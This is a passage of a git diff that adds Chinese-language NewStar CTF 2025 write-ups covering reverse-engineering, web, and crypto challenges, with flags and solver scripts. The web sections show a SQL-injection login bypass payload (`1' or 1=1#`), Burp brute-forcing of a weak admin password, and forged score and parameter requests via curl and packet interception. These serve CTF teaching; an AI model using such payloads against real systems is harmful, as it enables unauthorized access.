+ +根据提示在 `x0r()` 里找到 flag,因为 cipher 经过自解密,我们在解密完的地方打断点: + +![打断点](/assets/images/wp/2025/week1/plzdebugme_12.png) + +![观察数据](/assets/images/wp/2025/week1/plzdebugme_13.png) + +![观察数据](/assets/images/wp/2025/week1/plzdebugme_14.png) + +按 a 就能将数据转化为可见字符形式。 + +![获得 flag](/assets/images/wp/2025/week1/plzdebugme_15.png) + +最终 FLAG 为:`flag{It3_D3bugG_T11me!_le3_play}`。 diff --git a/docs/wp/2025/week1/reverse/puzzle.md b/docs/wp/2025/week1/reverse/puzzle.md new file mode 100644 index 0000000..b84325b --- /dev/null +++ b/docs/wp/2025/week1/reverse/puzzle.md @@ -0,0 +1,61 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# Puzzle + + + +本题考查 IDA 软件中字符串搜索的使用。 + + +> [!INFO] +> 这道题主要目的是让新生知道 IDA 的一些常见操作。 + +用 IDA 打开附件之后,单击键盘 F5 反编译出 main 函数 + +![main 函数](/assets/images/wp/2025/week1/puzzle_1.png) + +首先观察到有一个函数 `Puzzle_Challenge`,点进去可以看到: + +![函数内容](/assets/images/wp/2025/week1/puzzle_2.png) + +这里面是 flag 的第一部分即`Do_Y0u_` + +接着继续往后看,根据提示 `functions have strange names`,在 `function` 列表中可以看到一个 `Like_7his_Jig` 函数和一个 `Its_about_part3` 函数。 + +点进 `Like_7his_Jig` 函数 : + +![Like_7his_Jig 函数内容](/assets/images/wp/2025/week1/puzzle_3.png) + +可以知道函数名字即为 flag 的第二部分 `Like_7his_Jig` + +点进 `Its_about_part3` 函数: + +![第三部分](/assets/images/wp/2025/week1/puzzle_4.png) + +有一个异或 `0xad`,密文在 `encrypted_array` 中,⇧ Shifte 提取出来为:`0xDE, 0xED, 0xDA, 0xF2, 0xDD, 0xD8, 0xD7, 0xD7` + +解密: + +```py +enc = [0xDE, 0xED, 0xDA, 0xF2, 0xDD, 0xD8, 0xD7, 0xD7] +part3 = "" +for i in range(len(enc)): + part3 += chr(enc[i] ^ 0xad) +print(part3) +#s@w_puzz +``` + +得到 flag 的第三部分即 `s@w_puzz` +⇧ shiftF12 查看字符串注意到可疑的字符串:`1e_Gam3`,点进去看到: + +![第四部分](/assets/images/wp/2025/week1/puzzle_5.png) + +所以 flag 的第四部分即 `1e_Gam3` + +最后将四个部分拼接起来再包裹上 `flag{}`,最终的 flag 即为 `flag{Do_Y0u_Like_7his_Jigs@w_puzz1e_Gam3}` diff --git a/docs/wp/2025/week1/reverse/strange-base.md b/docs/wp/2025/week1/reverse/strange-base.md new file mode 100644 index 0000000..dcc0603 --- /dev/null +++ b/docs/wp/2025/week1/reverse/strange-base.md @@ -0,0 +1,90 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# Strange Base + + + +本题考查 Base64 编解码及其变种的逆向分析。 + + +没去符号表,一眼就能发现 base64,密文是 `T>6uTqOatL39aP!YIqruyv(YBA!8y7ouCa9=` + +![密文](/assets/images/wp/2025/week1/strange-base_1.png) + +进入分析看到编码表是: + +`HElLo!A=CrQzy-B4S3|is'waITt1ng&Y0u^{/(>v<)*}GO~256789pPqWXVKJNMF` + +![编码表](/assets/images/wp/2025/week1/strange-base_2.png) + +所以我们找一个 base 解密脚本即可解密 + +```c +#include +#include +#include +#include +const char * const base64char = "HElLo!A=CrQzy-B4S3|is'waITt1ng&Y0u^{/(>v<)*}GO~256789pPqWXVKJNMF"; +int base64_decode( const char * base64, unsigned char * bindata ) +{ + int i, j; + unsigned char k; + unsigned char temp[4]; + + for ( i = 0, j = 0; base64[i] != '\0' ; i += 4 ) + { + memset( temp, 0xFF, sizeof(temp) ); + for ( k = 0 ; k < 64 ; k ++ ) + { + if ( base64char[k] == base64[i] ) + temp[0] = k; + } + for ( k = 0 ; k < 64 ; k ++ ) + { + if ( base64char[k] == base64[i + 1] ) + temp[1] = k; + } + for ( k = 0 ; k < 64 ; k ++ ) + { + if ( base64char[k] == base64[i + 2] ) + temp[2] = k; + } + for ( k = 0 ; k < 64 ; k ++ ) + { + if ( base64char[k] == base64[i + 3] ) + temp[3] = k; + } + + bindata[j++] = ((unsigned char)(((unsigned char)(temp[0] << 2)) & 0xFC)) | + ((unsigned char)((unsigned char)(temp[1] >> 4) & 0x03)); + if ( base64[i + 2] == '=' ) + break; + + bindata[j++] = ((unsigned char)(((unsigned char)(temp[1] << 4)) & 0xF0)) | + ((unsigned char)((unsigned char)(temp[2] >> 2) & 0x0F)); + if ( base64[i + 3] == '=' ) + break; + + bindata[j++] = ((unsigned char)(((unsigned char)(temp[2] << 6)) & 0xF0)) | + ((unsigned char)(temp[3] & 0x3F)); + } + return j; +} + +int main() +{ + unsigned char input[0x20] = {0}; + unsigned char output[0x20] = {0}; + unsigned char enc[] = "T>6uTqOatL39aP!YIqruyv(YBA!8y7ouCa9H"; + base64_decode(enc, output); + printf("%s\n", output); +} +``` + +运行脚本得到 flag:`flag{Wh4t_a_cra2y_8as3!!!}` diff --git a/docs/wp/2025/week1/reverse/x0r.md b/docs/wp/2025/week1/reverse/x0r.md new file mode 100644 index 0000000..3bb5994 --- /dev/null +++ b/docs/wp/2025/week1/reverse/x0r.md @@ -0,0 +1,91 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# X0r + + + +本题考查异或加密的逆向分析。 + + +加密逻辑都在 `main` 函数中: + +```c +int __fastcall main(int argc, const char **argv, const char **envp) +{ + char Str2[32]; // [rsp+20h] [rbp-60h] BYREF + _BYTE v5[16]; // [rsp+40h] [rbp-40h] + char Str[36]; // [rsp+50h] [rbp-30h] BYREF + int n24; // [rsp+74h] [rbp-Ch] + int n24_2; // [rsp+78h] [rbp-8h] + int n24_1; // [rsp+7Ch] [rbp-4h] + + _main(); + puts("Please input your flag: "); + scanf("%25s", Str); + n24 = strlen(Str); + if ( n24 == 24 ) + { + for ( n24_1 = 0; n24_1 < n24; ++n24_1 ) + { + if ( n24_1 % 3 ) + { + if ( n24_1 % 3 == 1 ) + Str[n24_1] ^= 0x11u; + else + Str[n24_1] ^= 0x45u; + } + else + { + Str[n24_1] ^= 0x14u; + } + } + v5[0] = 19; + v5[1] = 19; + v5[2] = 81; + for ( n24_2 = 0; n24_2 < n24; ++n24_2 ) + Str[n24_2] ^= v5[n24_2 % 3]; + strcpy(Str2, "anu`ym7wKLl$P]v3q%D]lHpi"); + if ( !strcmp(Str, Str2) ) + puts("Right flag!"); + else + puts("Wrong flag!"); + return 0; + } + else + { + puts("Wrong flag length!"); + return 0; + } +} +``` + +有两次加密操作,第一次是遍历字符串,根据索引对 3 取模的不同情况来进行异或,第二次是按周期异或数组,最后进行结果比较。 + +解密就从后往前逆回去,exp 如下: + +```python +enc = b"anu`ym7wKLl$P]v3q%D]lHpi" +v5 = [19, 19, 81] +temp = bytearray(enc) +for i in range(len(enc)): + temp[i] = temp[i] ^ v5[i % 3] + +for i in range(len(temp)): + if i % 3 == 0: + temp[i] ^= 0x14 + if i % 3 == 1: + temp[i] ^= 0x11 + if i % 3 == 2: + temp[i] ^= 0x45 + +flag = temp.decode() +print(flag) +``` + +最后得到的 flag 为 `flag{y0u_Kn0W_b4s1C_xOr}` diff --git a/docs/wp/2025/week1/web/black-w-1.md b/docs/wp/2025/week1/web/black-w-1.md new file mode 100644 index 0000000..ab4e1ec --- /dev/null +++ b/docs/wp/2025/week1/web/black-w-1.md @@ -0,0 +1,100 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 黑客小 W 的故事(1) + + + +本题考查 HTTP 请求协议及抓包工具的使用。 + + +欢迎来到骨钉大师的考验。 + +![起始页](/assets/images/wp/2025/week1/black-w-1_1.png) + +## 第一关 + +![挑战目标](/assets/images/wp/2025/week1/black-w-1_2.png) + +本关需要你连续点击这只虫子,最后获得 800 吉欧来到达下一关,可是在中途会被突如其来的古神给打乱阵脚,从而失去所有的吉欧。 + +本关的提示中给出,你可以使用**抓包**的方法来处理这个过程 + +![第一关提示](/assets/images/wp/2025/week1/black-w-1_3.png) + +我们可以下载 [yakit](https://www.yaklang.com/) 来帮助我们实现抓包的操作。 + +打开 yakit 之后,我们可以随便创建一个临时项目来处理这次的题目。 + +![yakit 使用教程](/assets/images/wp/2025/week1/black-w-1_4.png) + +打开之后可以点击启动劫持。 + +![yakit 使用教程](/assets/images/wp/2025/week1/black-w-1_5.png) + +你有若干种方法来使用 yakit 的劫持进行抓包,比较方便的一种方法是使用免配置启动。 + +![yakit 使用教程](/assets/images/wp/2025/week1/black-w-1_6.png) + +在使用免配置启动之后,yakit 会自动打开一个浏览器,并且抓取和记录这个浏览器里面的所有访问流量,非常像我们在使用 chrome 开发工具中的网络工具。 + +![yakit 使用教程](/assets/images/wp/2025/week1/black-w-1_7.png) + +等我们访问这个网页之后,就能在软件界面中看到所有的流量信息了,我们可以点击其中一个看看详细的请求包与响应包的内容。 + +![yakit 使用教程](/assets/images/wp/2025/week1/black-w-1_8.png) + +当然,抓包操作的话,我们可以点击左上角的手动劫持,然后点击一下网页中的虫子,看看我们的网页往后端发送了什么内容。 + +![yakit 使用教程](/assets/images/wp/2025/week1/black-w-1_9.png) + +所有前后端进行交互的内容都会被这里拦截住。根据上面的提示,我们可以一次性多打几只虫子,看来这里的数量就是通过 `count` 参数实现的。我们直接修改这个参数为 100000 试试。 + +![修改参数](/assets/images/wp/2025/week1/black-w-1_10.png) + +于是我们便通过了第一关。 + +## 第二关 + +本题中需要你和蘑菇先生交流,你可以选择使用浏览器的 hackbar 插件完成本题。你也可以继续使用 yakit 的抓包放包操作来完成。 + +提示中提到了你需要在 `GET` 参数中将 `shipin` 参数设为 `mogubaozi`。 + +此时再提到与蘑菇先生说话,他就会让你用 POST 参数告诉他你想要什么,根据前面的提示,向蘑菇先生提及骨钉这个事情。 + +> [!info] +> 如果使用 hackbar 传参数,不能直接填入 `guding`,需要 `guding=1` 这样的写法。否则 hackbar 不会将你的内容作为 body 传到后端中。 + +你可以继续拦截这个请求,并且将请求手动修改成 `POST`,然后在请求头中手动填入 `Content-Type: application/x-www-form-urlencoded` 以及 `Content-Length: 123`,这两个参数分别表示了你在使用 `POST` 方法时,你的 Body 的处理编码方式以及 Body 长度。其中 `Content-Length` 会被 yakit 自动修复。 + +![自定义请求包](/assets/images/wp/2025/week1/black-w-1_11.png) + +但是在这之后我们需要用 `DELETE` 方法帮忙蘑菇先生清除掉他身上的虫子。 + +与 `POST` 方法类似,我们修改 `POST` 方法为 `DELETE` 方法,然后在 body 中填入 `chongzi` 就可以了。 + +在这之后我们再重新使用 `POST` 方法提交一次 `guding` 就能够去往下一关了。 + +如果你在这里使用了 Fuzz 工具或者 BurpSuite 中的 repeater 工具进行操作,那么请在前往下一关前修改自己的 Cookie 为新的 Cookie。 + +> [!warning] +> 此处的 DELETE 参数的使用方法并不符合协议要求,仅供出题使用。 + +## 第三关 + +第三关中,提示让我们修改 `User-Agent` 头来表明自己的身份,这里我们不能够仅仅填入 CycloneSlash,还需要填入 CycloneSlash 的版本信息,也就是使用 User-Agent 的正式格式来进行请求。 + +请求头中填入 `User-Agent: CycloneSlash/1.0`,会发现席奥觉得我们的剑技太慢了,其实是在说我们的剑技版本太低了,需要填入更高的版本,这道题目需要填入大于等于 2.0 的版本。 + +然后下一关就会让我们填入冲刺斩,以相同的规则填入就可以了,这里的最低版本要求为 5.0。 + +![UA 要求](/assets/images/wp/2025/week1/black-w-1_12.png) + +## 结束 + +最后到达最后一关就能够直接获得 flag 了。~~本来这里还有一关的,后来觉得太麻烦,就算了。~~ diff --git a/docs/wp/2025/week1/web/center-php.md b/docs/wp/2025/week1/web/center-php.md new file mode 100644 index 0000000..6ddfc45 --- /dev/null +++ b/docs/wp/2025/week1/web/center-php.md @@ -0,0 +1,70 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 宇宙的中心是 PHP + + + +本题考查前端源代码分析、PHP 函数理解及绕过技巧。 + + +## 收集信息 + +进入后是一个前端小页面,会发现直接F12或者右键是没办法打开开发者工具的,这里提供几种办法查看源代码 + +1. 先开启开发者工具再访问网站 +2. 使用 Ctrl + Shift + I +3. 手动在 url 处输入 `view-source:` 前缀 + +然后就可以看到下一关的入口提示(这里以第三个方法为例) + +![level1 示例](/assets/images/wp/2025/week1/center-php_1.png) + +```plaintext + + +``` + +访问这个 php 文件可以看到代码 + +```php + + +这里是想考查一下遇到未知函数的检索能力。 + + +先来分析一下函数逻辑 + +首先代码要求 POST 名为 newstar2025 的参数,随后将参数以两种方式传入 intval 函数,我们可以到 PHP 的文档里查阅一下这个函数的作用和用法 [PHP: intval Manual](https://www.php.net/manual/zh/function.intval.php) + +![php-intval](/assets/images/wp/2025/week1/center-php_2.png) + +可以看到,`intval($value)` 和 `intval($value, 0)` 的区别在于后者会根据输入字符串的格式自动匹配进制,而前者则是默认的十进制 + +因此本体的绕过方式就非常明朗了,只需要传入一个其它进制的数字 `47` 即可,以下 POST 传参均可 + +```plaintext +newstar2025=057 +newstar2025=0x2f +newstar2025=0b101111 +``` diff --git a/docs/wp/2025/week1/web/control-you.md b/docs/wp/2025/week1/web/control-you.md new file mode 100644 index 0000000..e683e05 --- /dev/null +++ b/docs/wp/2025/week1/web/control-you.md @@ -0,0 +1,114 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 我真得控制你了 + + + +本题考查前端源代码分析、弱口令爆破。 + + +## 第一关 + +1. 先尝试浏览器打开控制台或查看源代码,发现全部被 ban 了,这里可以通过向 url 前添加 `view-source:` 来查看源代码。 +2. 分析源码发现当元素 `#shieldOverlay` 存在时,按钮不可用。通过控制台删除该元素后按钮即可点击。 + +```js +// 检查保护层状态 +function checkShieldStatus() { + const shield = document.getElementById("shieldOverlay"); + const button = document.getElementById("accessButton"); + + if (!shield) { + button.classList.add("active"); + button.disabled = false; + } else { + button.classList.remove("active"); + button.disabled = true; + } +} + +checkShieldStatus(); + +setInterval(checkShieldStatus, 500); + +document.getElementById("accessButton").addEventListener("click", function () { + if (!document.getElementById("shieldOverlay")) { + document.getElementById("nextLevelForm").submit(); + } +}); +``` + +3. 先打开控制台后再进入网站,先后删除 `devToolsWarning` 和 `#shieldOverlay` 元素即可使启动按钮可用,通过第一关。你也可以通过以下控制台代码删除: + +```js +document.getElementById("devToolsWarning").remove(); +document.getElementById("shieldOverlay").remove(); +``` + +## 第二关 + +结合 `太弱了` 和 URL 中 `weak_password` 的提示,猜测是弱口令爆破。 + +这里使用 [这个字典](/resources/wp25/password.top1000.txt) 先进行对 `admin` 用户的爆破。 + +进入 BurpSuite 先随便输入个密码进行抓包,接着发送至 intruder,将输入密码的部分选中再点击“添加payload” + +接着在右边的选项中选择“自定义迭代器”,导入你找到的字典,就可以进行攻击了 + +![Burp 攻击示例](/assets/images/wp/2025/week1/control-you_1.png) + +找到状态码与其他不同的请求,得知 `111111` 就是正确的密码。 + +![Burp 攻击示例](/assets/images/wp/2025/week1/control-you_2.png) + +BurpSuite爆破教程详情跳转 [https://blog.csdn.net/m0_62791201/article/details/141563438](https://blog.csdn.net/m0_62791201/article/details/141563438) + +## 第三关 + +分析页面源码,知道这是一个简单的 RCE 挑战。要使传的表达式等于 2025。 + +```php +if (is_array($input)) { + die("恭喜掌握新姿势"); +} +if (preg_match('/[^\d*\/~()\s]/', $input)) { + die("老套路了,行不行啊"); +} +if (preg_match('/^[\d\s]+$/', $input)) { + die("请输入有效的表达式"); +} +``` + +分析上述代码可知: + +无法使用数组绕过 `preg_match`。 + +正则表达式 `/[^\d*\/~()\s]/` 检查输入字符串 `$input` 是否包含**不允许的字符**。 + +**允许的字符集合**包括: + +- `\d`:数字(0-9) +- `*`:星号(乘法运算符或通配符) +- `\/`:斜杠(除法运算符,注意在正则中需要转义为 `\/`) +- `~`:波浪号(位非运算符) +- `()`:左括号和右括号(用于分组) +- `\s`:空白字符(包括空格、制表符、换行符等) + +无法仅使用数字和空白字符,必须包含至少一个运算符(`*`、`/`、`~`、`(`、`)`)才能通过第二个正则表达式 `/^[\d\s]+$/` 的检查。 + +这限制了我们不能直接输入 2025 或使用字母构造复杂的代码,只能使用数字和基本的数学运算符。所以思路便变得清晰:我们可以构造数学运算表达式来得到 2025。 + +尝试表达式: + +```plaintext +?newstar=405 * 5 +?newstar=~~2025 +``` + +成功计算 2025 后获取 FLAG diff --git a/docs/wp/2025/week1/web/multi-headach3.md b/docs/wp/2025/week1/web/multi-headach3.md new file mode 100644 index 0000000..6832c06 --- /dev/null +++ b/docs/wp/2025/week1/web/multi-headach3.md @@ -0,0 +1,82 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# multi-headach3 + + + +本题考查对 HTTP 协议及 `robots.txt` 文件的理解与应用。 + + +## 前言:给 CTF 新手的话 + +这是一道 Web 类型的 CTF 题目,主要考查你对 HTTP 协议和 Web 基础知识的理解。如果你是第一次接触 CTF,不用担心,我会一步步带你理解解题思路。 + +## 第一步:访问网站,观察页面内容 + +首先,我们访问题目给出的网站地址。你会看到一个简单的网页,内容大概是这样: + +```plaintext +Hello! +Today is 2025/08/28 +welcome to my first website! + +ROBOTS is protecting this website! +But... Why my head is so painful???!!! +``` + +### 初步分析 + +看到这个页面,有几个关键信息需要注意: + +1. **"ROBOTS is protecting this website!"**:这里明确提到了「ROBOTS」。 +2. **"Why my head is so painful"**:这里提到了「头痛」,结合题目名称「multi-headach3」。 + +作为 CTF 新手,你可能会想:什么是 ROBOTS?为什么要强调头痛? + +## 第二步:了解 robots.txt 文件 + +### 什么是 robots.txt? + +在 Web 开发中,`robots.txt` 是一个特殊的文件,用来告诉搜索引擎爬虫(机器人)哪些页面可以访问,哪些页面不能访问。这个文件通常放在网站的根目录下。 + +### 如何访问 robots.txt? + +在浏览器地址栏中,在网站地址后面加上 `/robots.txt`,比如: + +```plaintext +http://目标网站/robots.txt +``` + +### 动手操作 + +让我们访问一下这个网站的 `robots.txt` 文件。你会看到: + +```plaintext +User-agent: * +Disallow: /hidden.php +``` + +### 理解 robots.txt 内容 + +- `User-agent: *` 表示对所有的爬虫生效 +- `Disallow: /hidden.php` 表示禁止爬虫访问 `/hidden.php` 这个页面 + +**重要发现**:网站管理员不想让搜索引擎收录 `hidden.php` 这个页面! + +## 第三步:探索隐藏页面 + +现在我们知道了有一个 `hidden.php` 页面,让我们尝试访问它: + +```plaintext +http://目标网站/hidden.php +``` + +### 奇怪的现象 + +**最终答案**:通过访问 `/robots.txt` 发现隐藏页面 `/hidden.php`,然后使用开发者工具查看该页面的 HTTP 响应头,在 `Fl4g` 头部中找到 FLAG。 diff --git a/docs/wp/2025/week1/web/no-laugh.md b/docs/wp/2025/week1/web/no-laugh.md new file mode 100644 index 0000000..cf95ecd --- /dev/null +++ b/docs/wp/2025/week1/web/no-laugh.md @@ -0,0 +1,99 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 别笑,你也过不了第二关 + + + +本题考查前端源代码分析、HTTP 协议参数 HTTP 请求报文的发送。 + + +先打开游戏随便玩玩,发现第二关目标分数 1000000,无法正常完成。 + +## 收集信息 + +但是这是一道 web 题,所以我们开始收集信息 Ctrl + U 打开源代码审阅,发现游戏的主要逻辑在最后的 `script` 标签中,我们找到判断通关的逻辑: + +```js +if (score >= targetScores[currentLevel]) { + // 如果达成目标分数 + alert(`恭喜通过第 ${currentLevel + 1} 关!得分: ${score}`); + currentLevel++; + if (currentLevel < targetScores.length) { + // 下一关 + resetLevel(currentLevel); + startGame(); + } else { + // 全部通关 + gameEnded = true; + const formData = new URLSearchParams(); + formData.append("score", score); + // 提交分数到服务器,fetch /flag.php 获取 flag + fetch("/flag.php", { + method: "POST", + headers: { + "Content-Type": "application/x-www-form-urlencoded", + }, + body: formData.toString(), + }) + .then((res) => res.text()) + .then((data) => { + alert("服务器返回:\n" + data); + }) + .catch((err) => { + alert("请求失败: " + err); + }); + } +} +``` + +阅读代码可以知道通关时,`endLevel()` 会被调用,我们的分数被提交到 `flag.php`,服务器根据分数返回不同内容。 + +## 解题 + +法一:在浏览器控制台修改前端分数 + +F12 -> 打开控制台,输入以下代码: + +```js +score = 1000000; // 直接把分数改成目标值 +currentLevel = 1; // 直接到最后一关 +endLevel(); // 调用关卡结束函数提交 +``` + +法二:模拟POST请求 + +```sh +curl -X POST http://目标服务器/flag.php -d "score=1000000" +``` + +法三:通过抓包工具修改 + +但是要注意 + +```plaintext +POST请求 +Content-Type: application/x-www-form-urlencoded + +请求体: +score=100000 +``` + +举例: + +```plaintext +POST /flag.php HTTP/1.1 +Host: 47.104.154.99:22221 +Content-Type: application/x-www-form-urlencoded +............. +Cookie: session=xxx +Connection: keep-alive +Content-Length: 11 + +score=10001 +``` diff --git a/docs/wp/2025/week1/web/strange-login.md b/docs/wp/2025/week1/web/strange-login.md new file mode 100644 index 0000000..a512d3d --- /dev/null +++ b/docs/wp/2025/week1/web/strange-login.md @@ -0,0 +1,58 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# strange_login + + + +本题考查简单的 SQL 注入漏洞利用。 + + +这道题是一个典型的 SQL 注入挑战。题目描述中的 `1=1` 暗示了我们可以利用逻辑真值来绕过登录验证。我们猜测后台的 SQL 查询语句是: + +```php +$sql = "SELECT * FROM users WHERE username = '$user' AND password = '$pass'"; +``` + +这个查询语句将会把用户输入的用户名(`$user`)和密码(`$pass`)直接拼接到 SQL 语句中,没有进行任何过滤或转义,导致 SQL 注入漏洞。 + +我们的目标是通过注入,使 SQL 查询条件始终为真,从而绕过身份验证。常用的注入载荷是 `1' or 1=1#`,但这里需要根据查询语句的结构进行调整。 + +## 解题步骤 + +1. **理解查询结构**:查询语句是`SELECT * FROM users WHERE username = '$user' AND password = '$pass'`。我们需要在用户名或密码字段中输入特殊字符来改变查询逻辑。 +2. **选择注入点**:通常,我们在用户名字段进行注入,因为密码字段可能被哈希处理(但这里没有)。假设我们在用户名输入框注入。 +3. **构造注入载荷**: + +- 如果我们输入用户名:`1' or 1=1#`,密码任意(例如 `123`),那么查询语句会变成: + +```sql +SELECT * FROM users WHERE username = '1' or 1=1#' AND password = '123' +``` + +- 解释: + + - `1'` 闭合了用户名的单引号。 + - `or 1=1` 添加了一个永远为真的条件。 + - `#` 是MySQL中的注释符,会注释掉后面的所有内容,包括 `AND password = '123'`。 + +- 因此,实际执行的查询是: + +```sql +SELECT * FROM users WHERE username = '1' or 1=1 +``` + +这个查询会返回 `users` 表中的所有行,通常登录验证会检查是否有返回结果,如果有就登录成功。 + +4. **实际尝试**: + +- 在用户名输入框输入:`1' or 1=1#` +- 在密码输入框输入任意值(例如 `123`)。 +- 点击登录,应该会成功绕过登录。 + +5. **为什么这样工作**:因为 `1=1` 总是真,所以查询条件永远成立,返回所有用户数据。注释符 `#` 确保了密码检查被忽略,避免了密码错误。 diff --git a/docs/wp/2025/week2/crypto/dlp-1.md b/docs/wp/2025/week2/crypto/dlp-1.md new file mode 100644 index 0000000..e5dad3c --- /dev/null +++ b/docs/wp/2025/week2/crypto/dlp-1.md @@ -0,0 +1,14 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# DLP_1 + + + +本题考查离散对数问题。 + diff --git a/docs/wp/2025/week2/crypto/fhe-0-1.md b/docs/wp/2025/week2/crypto/fhe-0-1.md new file mode 100644 index 0000000..df8c529 --- /dev/null +++ b/docs/wp/2025/week2/crypto/fhe-0-1.md @@ -0,0 +1,26 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# FHE: 0 and 1 + + + +本题考查同态加密的分析。 + + +$$pk_i=r_ip+s_i$$ + +其中 $pk$ 是 `public_key` 的值,$r_i$ 是一个随机数,$s_i$ 是一个很小的数。 + +显然可以把 $s_i$ 爆破然后求最大公约数。 + +这样会得到 $p$ 的倍数,而先前给定了 $p$ 是 $128$ 位,除以几个小因子就可以得到 $p$。 + +$$c_i=b_i+n_i+l_i$$ + +其中 $b_i$ 是每个比特,$n_i$ 是一个偶数小噪音, $l_i$ 是 $p$ 倍数的大噪音。我们刚刚求出了 $p$,模 $p$ 就可以把 $l_i$ 去掉,再对 $2$ 取模就可以去掉 $n_i$。剩下的就是 $b_i$,拼起来就是我们要求的 flag 了。 diff --git a/docs/wp/2025/week2/crypto/group-theory-quiz.md b/docs/wp/2025/week2/crypto/group-theory-quiz.md new file mode 100644 index 0000000..d143618 --- /dev/null +++ b/docs/wp/2025/week2/crypto/group-theory-quiz.md @@ -0,0 +1,138 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 群论小测试 + + + +本题考查群论的基本概念。 + + +给了群的乘法表,让你输入这是哪个群。 + +下面我们简单讲讲抽象代数,希望在解答这个题的同时,也能带你形象地入门抽象代数。 + +群在描述某一种对称。比如**循环群** $C_n$ 里面一个元素直接 $a$ 通过群的运算就可以生成整个群。 + +$$\{e,a,a^2,\cdots,a^{n-1}\}$$ + +就比如我们只考虑正三角形的旋转。它顺时针旋转 $2\pi/3$ 的操作记作 $a$ ,我们把 $a$ 操作两次写成 $a\cdot a=a^2$ ,这个效果就是顺时针旋转 $4\pi/3$ ,我们可以记作 $b$ 。我们再让 $a$ 操作一次,就得到 $a^3$ ,它的效果是顺时针旋转 $2\pi$,实际上约等于没转,我们可以记作 $e$,这样我们就得到了关于三角形旋转的群 $\{e,a,b\}$。 + +其中,群的运算是对三角形旋转操作的复合,$e$ 是恒等元,它相当于“没动”。观察发现,$e,a,b$ 无论怎么复合操作,结果都是这个集合的元素之一。而且每个元素从效果上看,都有它的“逆”,比如操作 $a$ 的逆是操作 $b$ ,因为 $ab=e$。 + +这样我们就得到了一个三阶循环群 $C_3$。 + +而如果我们把群的运算改成模 $3$ 加,元素改为 $\{0,1,2\}$ ,这样我们就得到了 $Z_3$ ,也就是模 $3$ 整数群。很显然它和 $C_3$ 几乎没什么区别。 + +接着我们给正三角形三个角逆时针标上数字 $1,2,3$ ,上面讲的操作 $a$ 其实可以看成三个角换了位置,即原来的 $1$ 号角变成了 $2$ 号角,也就是 $1\rightarrow 2\rightarrow 3\rightarrow 1$ 。我们可以记成 $(123)$ , 这是一种被称为**轮换**的记法。它表示一个置换:$1$ 号位置去到 $2$ 号位置,$2$ 号去到 $3$ 号位置,$3$ 号回到 $1$ 号位置。 + +我们之前只考虑了正三角形的旋转,但一个正三角形的对称操作还包括**反射**(翻转)。想象一下,沿着穿过一个顶点和对边中点的直线把三角形翻过来。 + +1. 恒等操作(不动):$e$ +2. 顺时针旋转 $120^\circ$:$(123)$ +3. 顺时针旋转 $240^\circ$(或逆时针 $120^\circ$):$(132)$ +4. 沿着穿过 $1$ 号角的轴翻转:这会交换 $2$ 号和 $3$ 号角,记作 $(23)$ +5. 沿着穿过 $2$ 号角的轴翻转:交换 $1$ 号和 $3$ 号角,记作 $(13)$ +6. 沿着穿过 $3$ 号角的轴翻转:交换 $1$ 号和 $2$ 号角,记作 $(12)$ + +这 6 个操作全部放在一起,就构成了正三角形的完全对称群,我们称之为 $3$ 阶**对称群**,记作 $S_3$。 + +$$ S_3 = \{e, (123), (132), (12), (13), (23)\} $$ + +这里的群运算是置换的复合(先做一个操作,再做另一个)。 + +一个有限群的结构可以很清晰地用一个**乘法表**(也叫凯莱表)来表示。下面是 $S_3$ 的乘法表。表中的元素是“行操作 $\cdot$ 列操作”的结果。 + +| $\cdot$ | $e$ | $(123)$ | $(132)$ | $(12)$ | $(13)$ | $(23)$ | +| :---------: | :-----: | :-----: | :-----: | :-----: | :-----: | :-----: | +| **$e$** | $e$ | $(123)$ | $(132)$ | $(12)$ | $(13)$ | $(23)$ | +| **$(123)$** | $(123)$ | $(132)$ | $e$ | $(13)$ | $(23)$ | $(12)$ | +| **$(132)$** | $(132)$ | $e$ | $(123)$ | $(23)$ | $(12)$ | $(13)$ | +| **$(12)$** | $(12)$ | $(23)$ | $(13)$ | $e$ | $(132)$ | $(123)$ | +| **$(13)$** | $(13)$ | $(12)$ | $(23)$ | $(123)$ | $e$ | $(132)$ | +| **$(23)$** | $(23)$ | $(13)$ | $(12)$ | $(132)$ | $(123)$ | $e$ | + +**观察**:仔细看这个表,你会发现它不是沿对角线对称的。例如,$(123) \cdot (12) = (13)$,但是 $(12) \cdot (123) = (23)$。这说明操作的顺序很重要! + +如果一个群中任意两个元素 $a, b$ 都满足 $a \cdot b = b \cdot a$,我们就称这个群为**阿贝尔群**,也叫**交换群**。 + +- 我们之前遇到的循环群 $C_3 = \{e, a, b\}$ 就是阿贝尔群,因为 $a \cdot b = b \cdot a = e$。 +- 模 $3$ 整数群 $Z_3$ 也是阿贝尔群,因为普通加法满足交换律 $(1+2 = 2+1)$。 +- 但是,对称群 $S_3$ **不是**阿贝尔群,正如我们从乘法表中看到的。 + +我们之前说 $C_3$ 和 $Z_3$ “几乎没什么区别”。现在我们可以把这个概念精确化。如果两个群 $(G, \cdot)$ 和 $(H, *)$ 之间存在一个一一对应的映射 $f: G \to H$,并且这个映射能完美地保持运算关系,即对于任意 $g_1, g_2 \in G$,都有 +$$ f(g_1 \cdot g_2) = f(g_1) \* f(g_2) $$ +那么我们就说这两个群是**同构**的,记作 $G \cong H$。 +“同构”意味着这两个群拥有完全相同的**结构**,只是元素的“名字”和运算的“符号”不同。对于 $C_3$ 和 $Z_3$,我们可以建立如下映射: +$$ e \mapsto 0 ; a \mapsto 1 ; b \mapsto 2 $$ +我们来验证一下: + +- $a \cdot b = e$ 映射到 $1 +2 = 0$ (模 3 加法) +- $a \cdot a = b$ 映射到 $1 + 1 = 2$ +- $b \cdot b = a$ 映射到 $2 + 2 = 1$ + 